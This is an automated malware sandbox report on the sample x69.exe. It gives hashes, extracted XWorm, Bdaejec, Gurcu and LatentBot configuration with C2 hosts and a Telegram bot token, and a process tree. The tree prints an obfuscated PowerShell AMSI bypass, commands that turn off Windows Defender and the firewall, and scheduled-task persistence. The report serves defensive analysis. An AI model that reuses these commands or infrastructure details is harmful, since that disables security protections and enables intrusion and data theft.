Analysis

  • max time kernel
    102s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/05/2025, 21:14

General

  • Target

    x69.exe

  • Size

    285KB

  • MD5

    20841606ce69632f258221219aeee09b

  • SHA1

    b72918797186774598792c47b66d5857be59f576

  • SHA256

    1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

  • SHA512

    aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e

  • SSDEEP

    6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI

Malware Config

Extracted

Family

xworm

Version

3.1

C2

grayhatgroupontop.zapto.org:1177

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

latentbot

C2

grayhatgroupontop.zapto.org

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 5 IoCs

    Bdaejec is backdoor written in C++.

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Latentbot family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 43 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4e50d135-7a6d-4d0f-a5bc-ef624923cc50}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3508
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:972
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:704
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1012
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1076
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:1148
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1204
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2264
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:soqzriFICKPX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IWGxBxzgptDfOy,[Parameter(Position=1)][Type]$rHbiIemdzf)$pCFXamWdnuY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+'ass,'+'A'+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pCFXamWdnuY.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+'c'+'i'+'a'+''+'l'+'Na'+'m'+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',Pub'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$IWGxBxzgptDfOy).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$pCFXamWdnuY.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$rHbiIemdzf,$IWGxBxzgptDfOy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $pCFXamWdnuY.CreateType();}$IQgCZHrUAgeOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+'iv'+'e'+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'ods');$lGFXxxMfZrJrUx=$IQgCZHrUAgeOB.GetMethod(''+'G'+'e'+[Char](116)+'P'+[Char](114)+'o'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+'i'+'c,'+'S'+'ta'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lMUowgDplkGbOCaSZHX=soqzriFICKPX @([String])([IntPtr]);$IJcTzqqwsXVuxeflbOdmSz=soqzriFICKPX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YOrndKdnUVj=$IQgCZHrUAgeOB.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+'le').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2.'+[Char](100)+'l'+'l'+'')));$oTZslXcysVUokr=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$YOrndKdnUVj,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+'a'+'r'+'y'+[Char](65)+'')));$AooJiHWKjhuquyQjE=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$YOrndKdnUVj,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$AaJSPUX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oTZslXcysVUokr,$lMUowgDplkGbOCaSZHX).Invoke('a'+'m'+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$DmUKzttPSgYIwmfuP=$lGFXxxMfZrJrUx.Invoke($Null,@([Object]$AaJSPUX,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'fer')));$egDyXnxAlh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AooJiHWKjhuquyQjE,$IJcTzqqwsXVuxeflbOdmSz).Invoke($DmUKzttPSgYIwmfuP,[uint32]8,4,[ref]$egDyXnxAlh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DmUKzttPSgYIwmfuP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AooJiHWKjhuquyQjE,$IJcTzqqwsXVuxeflbOdmSz).Invoke($DmUKzttPSgYIwmfuP,[uint32]8,0x20,[ref]$egDyXnxAlh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue('x'+'6'+'9'+'s'+''+'t'+'a'+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4092
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4600
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:3352
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                      1⤵
                        PID:1220
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1284
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1316
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1360
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1368
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1476
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2868
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1512
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1528
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1668
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1688
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1732
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1800
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1820
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1956
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1972
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1140
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1724
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1912
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2132
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2212
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2416
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2524
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2536
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2680
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2716
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2728
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2740
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2752
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2968
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3032
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3152
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3332
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:3412
                                                                                  • C:\Users\Admin\AppData\Local\Temp\x69.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\x69.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4904
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3956
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3708
                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4556
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2580
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2412
                                                                                    • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2612
                                                                                      • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4120
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9942.tmp\9953.tmp\9954.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                        4⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1156
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3264
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4148
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4824
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3908
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3400
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2580
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2424
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4148
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4080
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3972
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4148
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4056
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4080
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1444
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4436
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1432
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                            6⤵
                                                                                              PID:4440
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:5032
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                              6⤵
                                                                                                PID:1404
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4308
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                6⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:4160
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                              5⤵
                                                                                                PID:3400
